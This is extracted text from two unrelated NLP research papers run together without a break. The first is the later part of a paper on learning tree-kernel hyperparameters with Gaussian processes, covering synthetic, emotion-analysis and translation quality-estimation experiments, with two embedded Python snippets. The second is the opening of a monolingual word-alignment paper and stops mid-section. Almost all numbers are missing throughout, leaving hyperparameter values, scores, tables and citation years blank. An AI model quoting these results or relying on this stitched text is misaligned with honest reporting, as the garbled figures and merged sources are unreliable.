to answer this question, we run a set of experiments using synthetic data. we generate this data by using a set of natural language syntactic trees, where we fix a ran- dom subset of instances for testing and use the remaining instances as training. for each train- ing set size we define a gp over the full dataset, sam- ple a function from it and use the function output as the response variable for each tree. we try two dif- ferent gp priors, one using the sstk and another one using the sasstk. the conditions above provide a controlled envi- ronment to check the modelling capacities of our ap- proach since we know the exact distribution where the data comes from. the reasoning behind these experiments is that to be able to provide benefits in real tasks, where the data distribution is not known, our models have to be learnable in this controlled setting as well using a reasonable amount of data. finally, we also provide an empirical evaluation comparing the speed performance between our ap- proach and grid search. . sstk prior our first experiments use a sstk as the kernel with λ = . ,α = and σ n = . . after obtaining the input trees and their sampled labels, we define a new gp model using only the training data plus the obtained response variables, this time using a sstk with randomized hyperparameter values. then we optimize the gp and check if the learned hyperpa- rameters are close to the original ones, using ran- dom restarts to limit the effect of local optima. we also use the optimized gp to predict response vari- ables on the test set and measure root mean squared error (rmse). our hypothesis is that with a reason- able sample size we can retrieve the original hyper- parameter values and obtain low rmse. for each training set size, we repeat the experiment times. figure shows the results of these experiments. for small sizes the variance in the resulting hyperpa- rameter values is large but as soon as we reach instances we are able to retrieve the original values with high confidence. in other words, in an ideal set- ting instances are enough to learn the kernel. it is also interesting to note that test rmse after opti- mization steadily decreases as we increase training data size. this shows that if one is more interested in predictions themselves, it is still worth optimizing hyperparameters even if the training data is small. figure : results of synthetic experiments optimizing sstk. the x axes correspond to different training set sizes and the the y axes are the obtained hyperparame- ter values in the first three plots and rmse in the last plot. dashed lines show the original hyperparameter val- ues. points are offset in rmse chart for legibility. . sasstk prior the large number of hyperparameters of the sasstk makes it more prone to optimization and overfitting issues when compared to the sstk. this raises the question of how much data is needed to justify its use. to address this question, we run sim- ilar experiments to those above for the sstk, except that now we sample from a gp using a sasstk as the kernel. instead of optimizing all hyperparameters freely we use a simpler version where we tie λ and α for each symbol to the same value, except for the sym- bol ’s’. effectively this version has one extra λ and one extra α (henceforth λs and αs) when compared to the sstk. the gp prior hyperparameter values are set to λ = . ,λs = . ,α = . ,αs = and σ n = . . 
for each training set size, we train two gps, one using this sasstk and one using the original sstk, optimize them using random restarts and measure rmse on the test set. results are shown in figure . for all training set sizes the sasstk reaches lower rmse than sstk, with a substantial difference after reaching in- stances. this shows that even for small datasets our proposed kernel manages to capture aspects which can not be explained by the original sstk. note that this is an ideal setting, and real datasets may need to be larger to realize gains from sasstk. neverthe- less, these are promising results since they give evi- dence of a small lower bound on the dataset size for sasstk to be effective. figure : results from synthetic experiments comparing sstk and sasstk. the x axis is training set size while the y axis corresponds to rmse. . performance experiments to provide an overview of how efficient is the gradient-based method compared to grid search we also run a set of experiments measuring wall clock training time vs. rmse on a test set. for both gp and svm models we employ the sstk as the kernel and we use the same synthetic data from the previ- ous experiments . we perform runs, keeping the test set as the same instances for all runs and randomly sampling instances from the remain- ing instances as training data. figure shows the curves for both gp and svm models. the gp curve is obtained by increasing the maximum number of iterations of the gradient-based method (in this case, l-bfgs) and the svm curve is obtained by increasing the granularity of the grid size. figure : results from performance experiments. the x axis corresponds to wall clock time in seconds and it is in log scale. the y axis shows rmse on the test set. the blue dashed line corresponds to the rmse value obtained after l-bfgs converged. error bars are obtained by mea- suring one standard deviation over the runs made in each experiment. we can see that optimizing the gp model is con- sistently much faster than doing grid search on the svm model (notice the logarithmic scale), even though it shows some variance when letting l-bfgs run for a larger number of iterations. the gp model also is able to better predictions in general. even when taking the variances into account, grid search would still need around times more computation for specific details on the svm models used in all experi- ments performed in this paper we refer the reader to appendix a. time to achieve the same predictions obtained by the gp model. in real settings, svms predictions tend to be more on par with the ones provided by a gp (as shown in § ) but nevertheless these figures show that the gp can be much more time efficient when optimizing hyperparameters of a tree kernel. an important performance aspect to take into ac- count is parallelization. grid search is embarass- ingly parallelizable since each grid point can run in a different core. however, the gp optimization can also benefit from multiple cores by running each ker- nel computation inside the gram matrix in parallel. to keep the comparisons simpler, the results shown in this section use a single core but all experiments in § employ parallelization in the gram matrix com- putation level (for both svm and gp models). nlp experiments our experiments with nlp data address two regres- sion tasks: emotion analysis and quality estima- tion. for both tasks, we use the stanford parser (manning et al., ) to obtain constituency trees for all sentences. 
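both tasks share the same modelling pipeline: parse the sentences, compute the tree-kernel gram matrix, and fit a gp by maximizing the log marginal likelihood from the gp section above with a gradient-based optimizer (l-bfgs, as in the performance experiments). the snippet below is a schematic of that loop under our own assumptions, not the authors' code: in particular, `gram` is a hypothetical helper returning the kernel matrix and its hyperparameter gradients (it could be built on the sstk sketch given earlier), and the noise variance is optimized in log space.

```python
import numpy as np
from scipy.optimize import minimize

def neg_log_evidence(theta, trees, y, gram):
    # gram() returns the kernel matrix over the training trees and the list of
    # its gradients w.r.t. each kernel hyperparameter in theta[:-1]
    K, dK = gram(trees, theta[:-1])
    noise = np.exp(theta[-1])                      # noise variance, optimized in log space
    G = K + noise * np.eye(len(y))
    L = np.linalg.cholesky(G)
    alpha = np.linalg.solve(L.T, np.linalg.solve(L, y))   # alpha = G^{-1} y
    nll = 0.5 * y @ alpha + np.log(np.diag(L)).sum() + 0.5 * len(y) * np.log(2 * np.pi)
    Ginv = np.linalg.inv(G)
    dG_list = list(dK) + [noise * np.eye(len(y))]  # gradient of G w.r.t. the log-noise
    grads = np.array([-0.5 * alpha @ dG @ alpha + 0.5 * np.trace(Ginv @ dG) for dG in dG_list])
    return nll, grads

# typical usage (theta0 stacks the kernel hyperparameters and the log-noise):
# result = minimize(neg_log_evidence, theta0, args=(trees, y, gram),
#                   jac=True, method="L-BFGS-B")
```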
also, rather than using data official splits, we perform -fold cross-validation in order to obtain more reliable results. . emotion analysis the goal of emotion analysis is to automatically de- tect emotions in a text (strapparava and mihalcea, ). this problem is closely related to opinion mining (pang and lee, ), with similar appli- cations, but it is usually done at a more fine-grained level and involves the prediction of a set of labels for each text (one for each emotion) instead of a single label. beck et al. ( a) used a multi-task gp for this task with a bag-of-words feature representation. in theory, it is possible to combine their multi-task ker- nel with our tree kernels, but to keep the focus of the experiments on testing tree kernel approaches, here we use independently trained models, one per emo- tion. dataset we use the dataset provided by the “af- fective text” shared task in semeval (strap- parava and mihalcea, ), which is composed of news headlines annotated in terms of six emo- tions: anger, disgust, fear, joy, sadness and sur- prise. for each emotion, a score between and is given, meaning total lack of emotion and , maximally emotional. scores are mean-normalized before training the models. models we perform experiments using the follow- ing tree kernels: • sstk: the sstk formulation introduced by moschitti ( b); • sasstkfull: our proposed symbol-aware sstk; • sasstks: same as before, but using only two λ and two α hyperparameters: one for sym- bols corresponding to full sentences and an- other for all other symbols. this configuration is similar to that in section . . for all kernels, we also use a variation fixing the α hyperparameters to to emulate the original sstk. baselines and evaluation our results are com- pared against three baselines: • svm sstk: a svm using an sstk kernel. • svm bow: same as before, but using an rbf kernel with a bag-of-words representation. • gp bow: same as svm bow but using a gp instead. the svm models are trained using a wrapper for libsvm (chang and lin, ) provided by the scikit-learn toolkit (pedregosa et al., ) and op- timized via grid search. following previous work, we use pearson’s correlation coefficient as evalua- tion metric. pearson’s scores are obtained by con- catenating all six emotions outputs together. table shows the results. the best gp model with tree kernels outperforms the svms, showing that the fine-grained model selection procedure pro- vided by the gp models is helpful when dealing with tree kernels. however, using the sasstk models do not help in the case of free α and the sasstkfull actually performs worse than the original sstk, in this dataset, symbols are s, sq, sbarq and sinv . http://www.csie.ntu.edu.tw/˜cjlin/ libsvm http://scikit-learn.org even though the optimized marginal likelihood was higher. this is evidence that the sasstkfull model is overfitting the training data, probably due to its large number of hyperparameters. pearson’s svm bow . svm sstk . gp bow . (free α) gp sstk . gp sasstkfull . gp sasstks . (fixed α = ) gp sstk . gp sasstkfull . gp sasstks . table : pearson’s correlation scores for the emotion analysis task (higher is better). another interesting finding in table is that fix- ing the α values often harms performance. inspect- ing the free α models showed that the values found by the optimizer were very close to zero. this in- dicates that the model selection procedure prefer towards giving smaller weights to incomplete tree fragments. 
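to make the kernel combinations concrete, the following sketch (again illustrative, reusing the `sstk` function from the earlier sketch and assuming precomputed quest feature vectors; in the actual models the source and target tree kernels carry their own hyperparameters and the kernels are normalized) builds the summed or multiplied tree-kernel gram matrix over (source tree, target tree) pairs and adds an rbf kernel over the explicit features.

```python
import numpy as np

def gram(trees_a, trees_b, lam, alpha):
    # pairwise tree-kernel matrix, reusing the sstk sketch from earlier
    return np.array([[sstk(t1, t2, lam, alpha) for t2 in trees_b] for t1 in trees_a])

def qe_kernel(src_trees, tgt_trees, feats, lam, alpha, mode="sum", gamma=1.0):
    k_src = gram(src_trees, src_trees, lam, alpha)   # kernel on the source parse trees
    k_tgt = gram(tgt_trees, tgt_trees, lam, alpha)   # kernel on the target parse trees
    sq = ((feats[:, None, :] - feats[None, :, :]) ** 2).sum(-1)
    k_rbf = np.exp(-gamma * sq)                      # rbf kernel on the explicit feature vectors
    k_tree = k_src + k_tgt if mode == "sum" else k_src * k_tgt
    return k_tree + k_rbf                            # combined gram matrix for the gp (or svm)
```

the resulting matrix can be passed to a gp or svm solver as a precomputed kernel.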
we can interpret this as the model se- lecting a more lexicalized feature space, which also explains why the gp rbf model on bag-of-words performed the best in this task. finally, to understand how the optimized kernels could provide more interpretability, table shows the top λ values obtained by the sasstkfull (fixed α variant) with their corresponding symbols. in this specific case the kernel does not give the best performance so there are limitations in doing a full linguistic analysis. nevertheless, we believe this ex- ample shows the potential for developing more in- terpretable kernels. this is especially interesting be- cause these models take into account a much richer feature space than what it is allowed by parametric models. . quality estimation the goal of quality estimation is to provide a qual- ity prediction for new, unseen machine translated texts (blatz et al., ; bojar et al., ). exam- http://www.csie.ntu.edu.tw/~cjlin/libsvm http://www.csie.ntu.edu.tw/~cjlin/libsvm http://scikit-learn.org jjr . whadvp . vbp . prp$ . qp . whnp . wdt . jjs . nn . rbr . nns . jj . vbg . . . sq . table : top symbols sorted according to their ob- tained λ values in the sasstkfull model with fixed α. the numbers are the corresponding λ values, averaged over all six emotions. ples of applications include filtering machine trans- lated sentences that would require more post-editing effort than translation from scratch (specia et al., ), selecting the best translation from different mt systems (specia et al., ) or between an mt system and a translation memory (he et al., ), and highlighting segments that need revision (bach et al., ). while various quality metrics exist, here we focus on post-editing time prediction. tree kernels have been used before in this task (with svms) by hardmeier ( ) and hardmeier et al. ( ). while their best models combine tree kernels with a set of explicit features, they also show good results using only the tree kernels. this makes quality estimation a good benchmark task to test our models. datasets we use two publicly available datasets containing post-edited machine translated sentences. both are composed of a set of source sentences, their machine translated outputs and the corresponding post-editing time. • french-english (fr-en): this dataset, de- scribed in (specia, ), contains french sentences translated into english and post- edited by a novice translator. • english-spanish (en-es): this dataset was used in the wmt quality estimation shared task (bojar et al., ), containing sen- tences translated from english into spanish and post-edited by an expert translator. for each dataset, post-editing times are first di- vided by the translation output length (obtaining the post-editing time per word) and then mean normal- ized. models since our data consists of pairs of trees, our models in this task use a pair of tree kernels. we combine these two kernels by either summing or multiplying them. as for underlying tree ker- nels, we try both sstk and sasstks. as in the emotion analysis task, we also experiment with a set of kernel configurations with the α hyperparam- eters fixed at . we also test models that combine our tree kernels with an rbf kernel on a set of features extracted using the quest framework (spe- cia et al., ). these features are part of a strong baseline model used by the wmt shared task. 
baselines and evaluation we compare our results with a number of svm models: • svm sstk: same as in the emotion analysis task, using either a sum (+) or a product (×) of sstks. • svm rbf: this is an svm trained on the features extracted by quest. • svm rbf sstk: a combination of the two models above. for further comparison, we also show results ob- tained using a gp model and an rbf kernel on the quest-only features. following previous work, we measure prediction performance using both mean absolute error (mae) and rmse. the prediction results are given in table . they indicate a number of interesting findings: • for the fr-en dataset, the gp models combining tree kernels with an rbf kernel outperform all other models. results for the en-es dataset are less consistent, probably due to the small size of the dataset, but on average they are better than their svm counterparts. • the svms using a combination of kernels performs worse than using the rbf kernel alone. inspecting the models, we found that grid search actually harms performance. for instance, for the fr-en dataset, mae and rmse for the rbf + sstk × model before grid search are . and . , respectively. on the other hand, for this dataset all gp models achieve better results after optimization. • unlike in the emotion analysis task, fixing α results in better performance, even though the resulting models have lower marginal likeli- hood than the ones with free α. the same effect happened when comparing the sasstk mod- els with the sstk ones for the en-es dataset. both cases are evidence of model overfitting. french-english english-spanish mae rmse mae rmse (svm) rbf . . . . sstk + . . . . sstk × . . . . rbf sstk + . . . . rbf sstk × . . . . gp rbf . . . . (gp free α) sstk + . . . . sstk × . . . . sasstks + . . . . sasstks × . . . . (gp fixed α = ) sstk + . . . . sstk × . . . . sasstks + . . . . sasstks × . . . . (gp fixed α = ) rbf sstk + . . . . rbf sstk × . . . . rbf sasstks + . . . . rbf sasstks × . . . . table : error scores for the quality estimation task (lower is better). results are in terms of post-editing time per word. bold scores are the best ones for each dataset. we also inspect the resulting hyperparameters to obtain insights about the features used by the model. table shows the optimized λ values for the gp sstk models with fixed α for the fr-en dataset. the λ values obtained are higher for the target sentence kernels than for the source sentence ones. we can interpret this as the model giving preference to fea- tures from the target trees instead of the source trees, which is what we would expect for this task. . overfitting both nlp tasks show evidence that the gp models with large number of hyperparameters (sasstkfull in the case of emotion analysis and the free α mod- els in quality estimation) are overfitting the cor- responding datasets. while the bayesian formula- λsrc λtgt gp sstk + . . gp sstk × . . table : learned hyperparameters for the gp sstk mod- els in the fr-en dataset, with α fixed at . λsrc and λtgt are the hyperparameters corresponding to the kernels on the source and target parse trees, respectively. the values shown are averaged over the cross-validation results. tion for the marginal likelihood does help limiting overfitting, it does not prevent it completely. small datasets or invalid assumptions about the gaussian distribution of the data may still lead to poorly fitting models. 
another means of reducing overfitting is by taking a fully bayesian approach in which hyperpa- rameters are considered as random variables and are marginalized out (osborne, ); this is a research direction we plan to pursue in the future. . extensions to other tasks the gp framework introduced in section can be extended to non-regression problems by chang- ing the likelihood function. for instance, models for classification (rasmussen and williams, , chap. ), ordinal regression (chu and ghahramani, ) and structured prediction (altun et al., ; bratières et al., ) were proposed in the liter- ature. since the likelihood is independent of the kernel, a natural future step is to apply the kernels and models introduced in this paper to different nlp tasks. in light of that, we did initial experiments with constituency parsing reranking. the first results were inconclusive but we do believe this is because we employed naive approaches using classification ( -best result vs. all) and regression (using parse- val metrics as the response variable) models. a more appropriate way to tackle this task is by em- ploying a reranking-based likelihood and this is a direction we plan to pursue in the future. related work interest in model selection procedures for kernel- based methods has been growing in the last years. see also rasmussen and williams ( , chap. ) for an in-depth discussion on this issue. we thank the anonymous reviewers for this suggestion. one widely used approach for that is multiple ker- nel learning (mkl) (gönen and alpaydın, ). mkl is based on the idea of using combinations of kernels to model the data and developing algo- rithms to tune the kernel coefficients. this is dif- ferent from our method, where we focus on learning the hyperparameters of a single structural kernel. an approach similar to ours was proposed by igel et al. ( ). they combine oligo kernels (a kind of n- gram kernel) with mkl, derive their gradients and optimize towards a kernel alignment metric. com- pared to our approach, they restrict the length of the n-grams being considered, while we rely on dy- namic programming to explore the whole substruc- ture space. also, their method does not take into account the underlying learning algorithm. another recent approach proposed for model selection is ran- dom search (bergstra and bengio, ). like grid search, it has the drawback of not employing gra- dient information, as it is designed for any kind of hyperparameters (including categorical ones). structural kernels have been successfully em- ployed in a number of nlp tasks. the original sstk proposed by collins and duffy ( ) was used to rerank the output of syntactic parsers. re- cently, this reranking idea was also applied to dis- course parsing (joty and moschitti, ). other tree kernel applications include semantic role la- belling (moschitti et al., ) and relation extrac- tion (plank and moschitti, ). string kernels were mostly used in text classification (lodhi et al., ; cancedda et al., ), while graph ker- nels have been used for recognizing textual entail- ment (zanzotto and dell’arciprete, ). how- ever, these previous works focused on frequentist methods like svm or voted perceptron while we employ a bayesian approach. gaussian processes are a major framework in machine learning nowadays: applications in- clude robotics (ko et al., ), geolocation (schwaighofer et al., ) and computer vision (sinz et al., ). 
only very recently they have been successfully employed in a few nlp tasks such as translation quality estimation (cohn and specia, ; beck et al., b), detection of temporal pat- terns in text (preoţiuc-pietro and cohn, ), se- mantic similarity (rios and specia, ) and emo- tion analysis (beck et al., a). in terms of feature representations, previous work focused on the vecto- rial inputs and applied well-known kernels for these inputs, e.g. the rbf kernel. as shown on § . , our approach is orthogonal to these previous ones, since kernels can be easily combined in different ways. it is important to note that we are not the first ones to combine gps with kernels on structured inputs. driessens et al. ( ) employed a combination of gps and graph kernels for reinforcement learning. however, unlike our approach, they did not attempt model selection, evaluating only a few hyperparam- eter values empirically. conclusions this paper describes a bayesian approach for struc- tural kernel learning, based on gaussian processes for easy model selection. experiments applying our models to synthetic data showed that it is possible to learn structural kernel hyperparameters using a fairly small amount of data. furthermore we ob- tained promising results in two nlp tasks, includ- ing quality estimation, where we beat the state of the art. finally, we showed how these rich parame- terizations can lead to more interpretable kernels. beyond empirical improvements, an important goal of this paper is to present a method that en- ables new kernel developments through the exten- sion of the number of hyperparameters. we focused on the subset tree kernel, proposing an extension and then deriving its gradients. this approach can be applied to any structural kernel, as long as gradi- ents are available. it is our hope that this work will serve as a starting point for future developments in these research directions. acknowledgements daniel beck was supported by funding from cnpq/brazil (no. / - ). dr. cohn is the recipient of an australian research council future fellowship (project number ft ). the au- thors would also like to thank the three anonymous reviewers for their helpful comments and sugges- tions. references yasemin altun, thomas hofmann, and alexander j. smola. . gaussian process classification for segmenting and annotating sequences. in proceed- ings of icml. nguyen bach, fei huang, and yaser al-onaizan. . goodness: a method for measuring machine trans- lation confidence. in proceedings of acl, pages – . daniel beck, trevor cohn, and lucia specia. a. joint emotion analysis via multi-task gaussian pro- cesses. in proceedings of emnlp, pages – . daniel beck, kashif shah, and lucia specia. b. shef-lite . : sparse multi-task gaussian processes for translation quality estimation. in proceedings of wmt , pages – . james bergstra and yoshua bengio. . random search for hyper-parameter optimization. journal of machine learning research, : – . john blatz, erin fitzgerald, and george foster. . confidence estimation for machine translation. in proceedings of the th conference on computational linguistics, pages – . ondej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint- amand, radu soricut, lucia specia, and aleš tam- chyna. . findings of the workshop on statistical machine translation. in proceedings of wmt , pages – . sébastien bratières, novi quadrianto, and zoubin ghahramani. . 
bayesian structured prediction using gaussian processes. arxiv: . , pages – . nicola cancedda, eric gaussier, cyril goutte, and jean- michel renders. . word-sequence kernels. the journal of machine learning research, : – . chih-chung chang and chih-jen lin. . libsvm : a library for support vector machines. acm trans- actions on intelligent systems and technology (tist), ( ): – . wei chu and zoubin ghahramani. . gaussian pro- cesses for ordinal regression. journal of machine learning research, : – . trevor cohn and lucia specia. . modelling anno- tator bias with multi-task gaussian processes: an ap- plication to machine translation quality estimation. in proceedings of acl, pages – . michael collins and nigel duffy. . convolution kernels for natural language. in proceedings of nips, pages – . kurt driessens, jan ramon, and thomas gärtner. . graph kernels and gaussian processes for relational reinforcement learning. machine learning, ( - ): – . mehmet gönen and ethem alpaydın. . multi- ple kernel learning algorithms. journal of machine learning research, : – . christian hardmeier, joakim nivre, and jörg tiedemann. . tree kernels for machine translation quality estimation. in proceedings of wmt , pages – . christian hardmeier. . improving machine trans- lation quality prediction with syntactic tree kernels. in proceedings of eamt, pages – . david haussler. . convolution kernels on discrete structures. technical report, university of california at santa cruz. yifan he, yanjun ma, josef van genabith, and andy way. . bridging smt and tm with translation recommendation. in proceedings of acl, pages – . james hensman, nicolò fusi, and neil d. lawrence. . gaussian processes for big data. in proceed- ings of uai, pages – . christian igel, tobias glasmachers, britta mersch, and nico pfeifer. . gradient-based optimization of kernel-target alignment for sequence kernels ap- plied to bacterial gene start detection. ieee/acm transactions on computational biology and bioinfor- matics, ( ): – . shafiq joty and alessandro moschitti. . discrimi- native reranking of discourse parses using tree ker- nels. in emnlp, pages – . jonathan ko, daniel j. klein, dieter fox, and dirk haehnel. . gaussian processes and reinforce- ment learning for identification and control of an au- tonomous blimp. in proceedings of ieee interna- tional conference on robotics and automation, pages – . huma lodhi, craig saunders, john shawe-taylor, nello cristianini, and chris watkins. . text classifi- cation using string kernels. the journal of machine learning research, : – . christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of acl demo session, pages – . alessandro moschitti, daniele pighin, and roberto basili. . tree kernels for semantic role label- ing. computational linguistics, pages – . alessandro moschitti. a. efficient convolution ker- nels for dependency and constituent syntactic trees. in proceedings of ecml, pages – . alessandro moschitti. b. making tree kernels practical for natural language learning. in eacl, pages – . michael osborne. . bayesian gaussian processes for sequential prediction, optimisation and quadra- ture. ph.d. thesis, university of oxford. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( ): – . 
fabian pedregosa, gaël varoquaux, alexandre gram- fort, vincent michel, bertrand thirion, olivier grisel, mathieu blondel, peter prettenhofer, ron weiss, vin- cent duborg, jake vanderplas, alexandre passos, david cournapeau, matthieu brucher, matthieu per- rot, and édouard duchesnay. . scikit-learn: ma- chine learning in python. journal of machine learn- ing research, : – . daniele pighin and alessandro moschitti. . on re- verse feature engineering of syntactic tree kernels. in proceedings of conll, pages – . barbara plank and alessandro moschitti. . embed- ding semantic similarity in tree kernels for domain adaptation of relation extraction. in proceedings of acl, pages – . daniel preoţiuc-pietro and trevor cohn. . a tem- poral model of text periodicities using gaussian pro- cesses. in proceedings of emnlp, pages – . carl edward rasmussen and christopher k. i. williams. . gaussian processes for machine learning, vol- ume . mit press cambridge. miguel rios and lucia specia. . uow : multi-task learning gaussian process for semantic textual sim- ilarity. in proceedings of semeval, pages – . anton schwaighofer, marian grigoras, volker tresp, and clemens hoffmann. . gpps: a gaussian pro- cess positioning system for cellular networks. in proceedings of nips, pages – . fabian h. sinz, joaquin quiñonero candela, gökhan h. bakır, carl e. rasmussen, and matthias o. franz. . learning depth from stereo. pattern recog- nition, pages – . lucia specia, nicola cancedda, marc dymetman, marco turchi, and nello cristianini. . estimating the sentence-level quality of machine translation systems. in proceedings of eamt, pages – . lucia specia, dhwaj raj, and marco turchi. . ma- chine translation evaluation versus quality estimation. machine translation, ( ): – . lucia specia, kashif shah, josé g. c. de souza, and trevor cohn. . quest - a translation quality estimation framework. in proceedings of acl demo session, pages – . lucia specia. . exploiting objective annotations for measuring translation post-editing effort. in pro- ceedings of eamt, pages – . carlo strapparava and rada mihalcea. . semeval- task : affective text. in proceedings of se- meval, pages – . carlo strapparava and rada mihalcea. . learning to identify emotions in text. in proceedings of the acm symposium on applied computing, pages – . fabio massimo zanzotto and lorenzo dell’arciprete. . efficient kernels for sentence pair classification. in proceedings of emnlp, pages – . a details on svm baselines all svm baselines employ the �-insensitve loss function. grid search optimization is done via - fold cross-validation on the respective training set and use rmse as the metric to be minimized. after obtained the best hyperparameter values, the svm is retrained using these values on the full respec- tive training set. the specific intervals used in grid search depend on the task. for the performance experiments on synthetic data, we employed an interval of [ − , ] for c (regularization coefficient) and �, [ − , ] for λ and [ − , ] for α. in each run we incrementally in- crease the size of the grid by adding intermediate values on each interval. we keep a linear scale for the sstk hyperparameters and a logarithmic scale for c and �. as an example, table shows the re- sulting grids when the grid value is for each hyper- parameter. for all nlp experiments the grid is fixed for all hyperparameters (including γ, the lengthscale value in the rbf kernel), with its corresponding val- ues shown on table . c / � [ − , − , , ] λ [ − , . , . , ] α [ − , . 
, . , ] table : resulting grids for the performance experiments when grid size is set to for each hyperparameter. c [ − , , ] � [ − , − , , ] λ [ − , . , . ] α [ ] (fixed) γ [ − , . , . , . , ] table : grid values for the nlp experiments. back to basics for monolingual alignment: exploiting word similarity and contextual evidence back to basics for monolingual alignment: exploiting word similarity and contextual evidence md arafat sultan†, steven bethard‡ and tamara sumner† †institute of cognitive science and department of computer science university of colorado boulder ‡department of computer and information sciences university of alabama at birmingham arafat.sultan@colorado.edu, bethard@cis.uab.edu, sumner@colorado.edu abstract we present a simple, easy-to-replicate monolin- gual aligner that demonstrates state-of-the-art performance while relying on almost no su- pervision and a very small number of external resources. based on the hypothesis that words with similar meanings represent potential pairs for alignment if located in similar contexts, we propose a system that operates by finding such pairs. in two intrinsic evaluations on alignment test data, our system achieves f scores of – %, demonstrating – % absolute improve- ment over the previous best system. moreover, in two extrinsic evaluations our aligner out- performs existing aligners, and even a naive application of the aligner approaches state-of- the-art performance in each extrinsic task. introduction monolingual alignment is the task of discovering and aligning similar semantic units in a pair of sentences expressed in a natural language. such alignments pro- vide valuable information regarding how and to what extent the two sentences are related. consequently, alignment is a central component of a number of important tasks involving text comparison: textual entailment recognition, textual similarity identifica- tion, paraphrase detection, question answering and text summarization, to name a few. the high utility of monolingual alignment has spawned significant research on the topic in the re- cent past. major efforts that have treated alignment as a standalone problem (maccartney et al., ; thadani and mckeown, ; yao et al., a) are primarily supervised, thanks to the manually aligned corpus with training and test sets from microsoft re- search (brockett, ). primary concerns of such work include both quality and speed, due to the fact that alignment is frequently a component of larger nlp tasks. driven by similar motivations, we seek to devise a lightweight, easy-to-construct aligner that produces high-quality output and is applicable to various end tasks. amid a variety of problem formulations and ingenious approaches to alignment, we take a step back and examine closely the effectiveness of two frequently made assumptions: ) related semantic units in two sentences must be similar or related in their meaning, and ) commonalities in their se- mantic contexts in the respective sentences provide additional evidence of their relatedness (maccartney et al., ; thadani and mckeown, ; yao et al., a; yao et al., b). alignment, based solely on these two assumptions, reduces to finding the best combination of pairs of similar semantic units in sim- ilar contexts. exploiting existing resources to identify similarity of semantic units, we search for robust techniques to identify contextual commonalities. dependency trees are a commonly used structure for this purpose. 
while they remain a central part of our aligner, we expand the horizons of dependency-based alignment beyond exact matching by systematically exploiting the notion of “type equivalence” with a small hand- crafted set of equivalent dependency types. in addi- tion, we augment dependency-based alignment with surface-level text analysis. while phrasal alignments are important and have transactions of the association for computational linguistics, ( ) – . action editor: alexander koller. submitted / ; revised / ; published / . c© association for computational linguistics. been investigated in multiple studies, we focus pri- marily on word alignments (which have been shown to form the vast majority of alignments (≥ %) in multiple human-annotated corpora (yao et al., b)), keeping the framework flexible enough to allow incorporation of phrasal alignments in future. evaluation of our aligner on the benchmark dataset reported in (brockett, ) shows an f score of . %: a . % absolute improvement over the previ- ous best system (yao et al., a), corresponding to a . % error reduction. it shows superior perfor- mance also on the dataset reported in (thadani et al., ). additionally, we present results of two extrinsic evaluations, namely textual similarity iden- tification and paraphrase detection. our aligner not only outperforms existing aligners in each task, but also approaches top systems for the extrinsic tasks. background monolingual alignment has been applied to various nlp tasks including textual entailment recognition (hickl et al., ; hickl and bensley, ), para- phrase identification (das and smith, ; madnani et al., ), and textual similarity assessment (bär et al., ; han et al., ) – in some cases ex- plicitly, i.e., as a separate module. but many such systems resort to simplistic and/or ad-hoc strategies for alignment and in most such work, the alignment modules were not separately evaluated on alignment benchmarks, making their direct assessment difficult. with the introduction of the msr alignment cor- pus (brockett, ) developed from the second recognizing textual entailment challenge data (bar- haim et al., ), direct evaluation and comparison of aligners became possible. the first aligner trained and evaluated on the corpus was a phrasal aligner called manli (maccartney et al., ). it repre- sents alignments as sets of different edit operations (where a sequence of edits turns one input sentence into the other) and finds an optimal set of edits via a simulated annealing search. weights of different edit features are learned from the training set of the msr alignment corpus using a perceptron learning algorithm. manli incorporates only shallow fea- tures characterizing contextual similarity: relative positions of the two phrases being aligned (or not) in the two sentences and boolean features representing whether or not the preceding and following tokens of the two phrases are similar. thadani and mckeown ( ) substituted manli’s simulated annealing-based decoding with integer linear programming, and achieved a consider- able speed-up. more importantly for our discussion, they found contextual evidence in the form of syn- tactic constraints useful in better aligning stop words. thadani et al. ( ) further extended the model by adding features characterizing dependency arc edits, effectively bringing stronger influence of contextual similarity into alignment decisions. again the perfor- mance improved consequently. 
the most successful aligner to date both in terms of accuracy and speed, called jacanaalign, was de- veloped by yao et al. ( a). in contrast to the earlier systems, jacanaalign is a word aligner that formulates alignment as a sequence labeling prob- lem. each word in the source sentence is labeled with the corresponding target word index if an align- ment is found. it employs a conditional random field to assign the labels and uses a feature set similar to manli’s in terms of the information they encode (with some extensions). contextual features include only semantic match of the left and the right neigh- bors of the two words and their pos tags. even though jacanaalign outperformed the manli en- hancements despite having less contextual features, it is difficult to compare the role of context in the two models because of the large paradigmatic dispar- ity. an extension of jacanaalign was proposed for phrasal alignments in (yao et al., b), but the contextual features remained largely unchanged. noticeable in all the above systems is the use of contextual evidence as a feature for alignment, but in our opinion, not to an extent sufficient to harness its full potential. even though deeper dependency- based modeling of contextual commonalities can be found in some other studies (kouylekov and magnini, ; chambers et al., ; chang et al., ; yao et al., c), we believe there is further scope for systematic exploitation of contextual evidence for alignment, which we aim to do in this work. on the contrary, word semantic similarity has been a central component of most aligners; various mea- sures of word similarity have been utilized, including string similarity, resource-based similarity (derived from one or more lexical resources like wordnet) align identical word sequences align named entities align content words align stop words figure : system overview and distributional similarity (computed from word co-occurrence statistics in large corpora). an impor- tant trade-off between precision, coverage and speed exists here and aligners commonly rely on only a subset of these measures (thadani and mckeown, ; yao et al., a). we use the paraphrase database (ppdb) (ganitkevitch et al., ), which is a large resource of lexical and phrasal paraphrases constructed using bilingual pivoting (bannard and callison-burch, ) over large parallel corpora. system our system operates as a pipeline of alignment mod- ules that differ in the types of word pairs they align. figure is a simplistic representation of the pipeline. each module makes use of contextual evidence to make alignment decisions. in addition, the last two modules are informed by a word semantic similarity algorithm. because of their phrasal nature, we treat named entities separately from other content words. the rationale behind the order in which the modules are arranged is discussed later in this section ( . . ). before discussing each alignment module in de- tail, we describe the system components that identify word and contextual similarity. . word similarity the ability to correctly identify semantic similarity between words is crucial to our aligner, since con- textual evidence is important only for similar words. instead of treating word similarity as a continuous variable, we define three levels of similarity. the first level is an exact word or lemma match which is represented by a similarity score of . the second level represents semantic similarity between two terms which are not identical. 
